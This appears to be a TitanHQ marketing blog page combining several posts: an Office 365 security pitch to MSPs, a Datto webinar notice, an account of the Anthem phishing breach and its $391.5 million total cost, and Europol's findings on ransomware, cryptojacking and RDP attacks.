How SpamTitan Protects Businesses from Email Threats
Security Solutions for MSPs to Block Office 365 Threats
Many MSPs resell Office 365 licenses to their customers. Office 365 allows MSPs to capture new business, but the margins are small. By offering additional services to enhance Office 365 security, MSPs can make their Office 365 offering more desirable to businesses while improving the profitability of Office 365.
TitanHQ has been developing innovative email and web security solutions for more than 25 years. Those solutions have been developed from the ground up with MSPs for MSPs. Three solutions are ideal for use with Office 365 for compliance ad to improve security – SpamTitan email filtering, WebTitan web filtering, and ArcTitan email archiving.
By incorporating these solutions into Office 365 packages, MSPs can provide clients with much greater value as well as significantly boosting the profitability of offering Office 365.
To find out more about each of these solutions, speak to TitanHQ. The MSP team will be happy to explain how the products work, how they can be implemented, and how they can boost margins on Office 365.
TitanHQ, the leading provider of web filtering, spam filtering, and email archiving solutions for managed service providers (MSPs) recently formed a strategic partnership with Datto Networking, the leading provider of MSP-delivered IT solutions to SMBs.
The partnership has seen TitanHQ’s advanced web filtering technology incorporated into the Datto Networking Appliance to ensure all users benefit from reliable and secure internet access.
TitanHQ’s web filtering technology provides enhanced protection from web-based threats while allowing acceptable internet usage policies to be easily enforced for all users at the organization, department, user group, or user level.
On October 18, 2018, Datto and TitanHQ will be hosting a webinar to explain the enhanced functionality of the Datto Networking Appliance to MSPs, including a deep dive into the new web filtering technology.
Webinar: Datto Networking & Titan HQ Deliver Enhanced Web Content Filtering
Date: Thursday, October 18th
Time: 11AM ET | 8AM PT | 4PM GMT/BST
Speakers: John Tippett, VP, Datto Networking; Andy Katz, Network Solutions Engineer; Rocco Donnino, EVP of Strategic Alliances, TitanHQ
In 2015, Anthem Inc., experienced a colossal data breach. 78.8 million health plan records were stolen. This year, the health insurer settled a class action data breach for $115 million and OCR has now agreed a $16 million Anthem data breach settlement.
It Started with a Spear Phishing Email…
The Anthem data breach came as a huge shock back in February 2015, due to the sheer scale of the breach. Healthcare data breaches were common, but the Anthem data breach in a different league.
Prior to the announcement, the unenviable record was held by Science Applications International Corporation, a vendor used by healthcare organizations, that experienced a 4.9 million record breach in 2011. The Anthem data breach was on an entirely different scale.
The hacking group behind the Anthem data breach was clearly skilled. Mandiant, the cybersecurity firm that assisted with the investigation, suspected the attack was a nation-state sponsored cyberattack. The hackers managed to gain access to Anthem’s data warehouse and exfiltrated a huge volume of data undetected. The time of the initial attack to discovery was almost a year.
While the attack was sophisticated, a foothold in the network was not gained through an elaborate hack or zero-day exploit but through phishing emails.
At least one employee responded to a spear phishing email, sent to one of Anthem’s subsidiaries, which gave the attackers the entry point they needed to launch a further attack and gain access to Anthem’s health plan member database.
The Anthem Data Breach Settlement is the Largest Ever Penalty for a Healthcare Data Breach
The U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) investigates healthcare data breaches that result in the exposure or theft of 500 or more records. An in-depth investigation of the Anthem breach was therefore a certainty given its scale. A penalty for non-compliance with Health Insurance Portability and Accountability Act (HIPAA) Rules was a very likely outcome as HIPAA requires healthcare organizations to safeguard health data. The scale of the breach also made it likely that it would result in the largest ever penalty for a healthcare data breach.
Before the Anthem data breach settlement, the largest penalty for a healthcare data breach was $5.55 million, which was agreed between OCR and Advocate Health Care Network in 2016. The Anthem data breach settlement was almost three times that amount, which reflected the seriousness of the breach, the number of people impacted, and the extent to which HIPAA Rules were alleged to have been violated.
OCR alleged that Anthem Inc., had violated five provisions of HIPAA Rules, and by doing so failed to prevent the breach and limit its severity. The Anthem data breach settlement was however agreed with no admission of liability.
The regulatory fine represents a small fraction of the total cost of the Anthem data breach. On top of the Anthem data breach settlement with OCR, Anthem faced multiple lawsuits in the wake of the data breach. The consolidated class action lawsuit was settled by Anthem in January 2018 for $115 million.
The class action settlement document indicated Anthem had already paid $2.5 to consultants in the wake of the breach, $31 million was spent mailing notification letters, $115 million went on improvements to security, and $112 million was paid to provide identity theft protection and credit monitoring services to affected plan members.
With the $115 million class action settlement and the $16 million OCR settlement, that brings the total cost of the Anthem data breach to $391.5 million.
At $391.5 million, that makes this the most expensive healthcare phishing attack by some distance and the cost clearly highlights just how important it is to adopt a defense-in-depth strategy to protect against phishing attacks.
Cybercriminals have turned to cryptocurrency mining malware as an easy, low-risk way of making money although ransomware is still the main malware threat according to Europol.
While it was common for large-scale spam email campaigns to be sent to random recipients to spread ransomware, tactics used to infect devices with the file-encrypting malware are changing.
There has been a decline in the use of ‘spray and pray’ spam campaigns involving millions of messages toward targeted attacks on businesses. Organized cybercriminal gangs are researching victims and are conducting highly targeted attacks that first involve compromising a network before manually deploying ransomware.
The cybercriminal group behind SamSam ransomware has been particularly prolific. Companies that have failed to address software vulnerabilities are attacked and access is gained to their networks. The SamSam group also conducts brute force attacks on RDP to gain access to business networks. Once access is gained, ransomware is manually installed on as many computers as possible, before the encryption routine is started across all infected devices. With a large number of devices encrypted, the ransom demand can be much higher – Typically around $50,000 per company. The group has collected at least $6 million in ransom payments to date.
Europol warns that ransomware attacks will continue to be a major threat over the following years, although a new threat is emerging – cryptojacking malware. This form of malware is used to hijack computer processors to mine cryptocurrency. Europol warns that if the rise in the use of cryptojacking malware continues it may overtake ransomware and become the biggest malware threat.
Not only does cryptojacking offer considerable rewards, in many cases use of the malware is not classed as illegal, such as when it is installed on websites. This not only means that cybercriminals can generate considerable profits, but the risk involved in these types of attacks is far lower than using ransomware.
Cybercriminals are still extensively using social engineering techniques to fool consumers and employees into disclosing sensitive personal information and login credentials. Social engineering is also extensively used to trick employees into making fraudulent bank transfers. Phishing is the most common form of social engineering, although vishing – voice phishing – and smishing – SMS phishing are also used. Europol notes that social engineering is still the engine of many cybercrimes.
While exploit kits have been extensively used to silently download malware, Europol notes that the use of exploit kits continues to decline. The main attack vectors are spam email and RDP brute-forcing.
As-a-service cyberattacks continue to be a major problem. DDoS-as-a-service and ransomware-as-a-service allow low-level and relatively unskilled individuals to conduct cyberattacks. Europol recommends law enforcement should concentrate on locating and shutting down these criminal operations to make it much harder for low-level criminals to conduct cyberattacks that would otherwise be beyond their skill level.
With spam email still a major attack vector, it is essential for businesses to implement cybersecurity solutions to prevent malicious emails from being delivered to inboxes and ensure cybersecurity best practices are adopted to make them less susceptible to attack. With phishing the main form of social engineering, anti-phishing training for employees is vital.
RDP attacks are now commonplace, so steps must be taken by businesses to block this attack vector, such as disabling RDP if it is not required, using extremely strong passwords for RDP, limiting users who can login, configuring account lockouts after a set number of failed login attempts, and using RDP gateways.